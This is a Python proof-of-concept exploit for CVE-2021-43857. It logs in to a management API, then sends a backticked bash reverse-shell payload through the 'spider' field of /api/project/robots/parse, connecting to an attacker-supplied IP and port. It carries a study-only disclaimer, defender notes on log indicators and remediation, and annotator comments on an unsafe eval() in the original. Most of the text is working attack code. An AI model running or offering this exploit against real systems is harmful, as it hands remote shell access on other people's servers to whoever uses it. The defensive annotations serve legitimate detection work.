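#!/bin/python3
# coding:utf-8
# Author:lowkey0808
"""Proof of concept for CVE-2021-43857 (authenticated command injection).

The script logs in at ``/api/user/auth`` with the supplied credentials and
then POSTs to ``/api/project/robots/parse`` with a ``spider`` value wrapped
in backticks. The server code is not shown here; the payload shape implies
that the ``spider`` field reaches a shell command unescaped.

Notes for defenders:

* The injection request carries an ``Authorization: Token ...`` header, so
  it needs a valid login. Exposure therefore depends on who can
  authenticate to the management API.
* In web or proxy logs, look for POSTs to ``/api/project/robots/parse``
  whose JSON ``spider`` value contains shell metacharacters such as
  backticks. On the host, look for the web application process spawning a
  shell or opening outbound connections.
* The ``python-requests/2.20.1`` User-Agent on that request is hard-coded
  in this script; treat it as a weak indicator only.
* Remediation is the fixed release named in the CVE-2021-43857 advisory
  (no version is given on this page), plus restricting network access to
  the management API.
"""
import sys
import requests
import argparse
import pyfiglet

print(pyfiglet.figlet_format('cve-2021-43857'))
print('''
免责声明:
脚本仅供学习参考,请勿恶意攻击他人网站,
如违法乱纪,造成一切后果由使用者自行承担
技术无罪,与作者无关
使用脚本默认同意以上说明!
--Author:lowkey0808
''')


def main():
    """Authenticate, then send the single injection request.

    Command-line options: ``-u`` base URL, ``-U`` / ``-P`` login name and
    password, ``-r`` / ``-p`` address and port placed into the payload.
    Every option defaults to the empty string (``argument_default=''``).

    Any exception, including the 2-second timeout on the second request,
    ends the process through ``sys.exit()`` with status 0 and no message.
    """
    try:
        parser = argparse.ArgumentParser(description='cve-2021-43857', argument_default='', usage='')
        parser.add_argument('-u', help='url', metavar='')
        parser.add_argument('-U', help='登录用户', metavar='')
        parser.add_argument('-P', help='登录密码', metavar='')
        parser.add_argument('-r', help='反弹shellIP', metavar='')
        parser.add_argument('-p', help='反弹端口', metavar='')
        argv = parser.parse_args()
        url = argv.u
        username = argv.U
        password = argv.P
        ip = argv.r
        port = argv.p

        # Obtain the API token
        u1 = url + "/api/user/auth"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
                         "Accept": "application/json, text/plain, */*",
                         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                         "Accept-Encoding": "gzip, deflate",
                         "Content-Type": "application/json;charset=utf-8",
                         "Origin": "%s" % url,
                         "Connection": "close",
                         "Referer": "%s" % url}
        burp0_json = {"password": "%s" % password, "username": "%s" % username}
        auth_response = requests.post(u1, headers=burp0_headers, json=burp0_json)
        # The response body is controlled by the remote host. The original
        # passed it to eval(), which would execute any Python expression the
        # server (or a honeypot posing as one) returned, on the machine
        # running this script. Parse it strictly as JSON instead.
        token = auth_response.json()
        token = 'Token ' + token["token"]
        # NOTE: this prints a live credential; it will end up in terminal
        # scrollback and any captured output.
        print(token)

        # Injection request (original comment: getshell)
        u2 = url + '/api/project/robots/parse'
        burp1_headers = {"User-Agent": "python-requests/2.20.1",
                         "Accept-Encoding": "gzip, deflate",
                         "Accept": "*/*",
                         "Connection": "keep-alive",
                         "Authorization": "%s" % token}
        burp1_json = {"spider": "`/bin/bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'`" % (ip, port)}
        print(burp1_json)
        requests.post(u2, headers=burp1_headers, json=burp1_json, timeout=2)
    except Exception as e:
        # Deliberately silent in the original; kept as-is. Exit status is 0,
        # so a caller cannot tell a failure from a completed run.
        sys.exit()


if __name__ == "__main__":
    main()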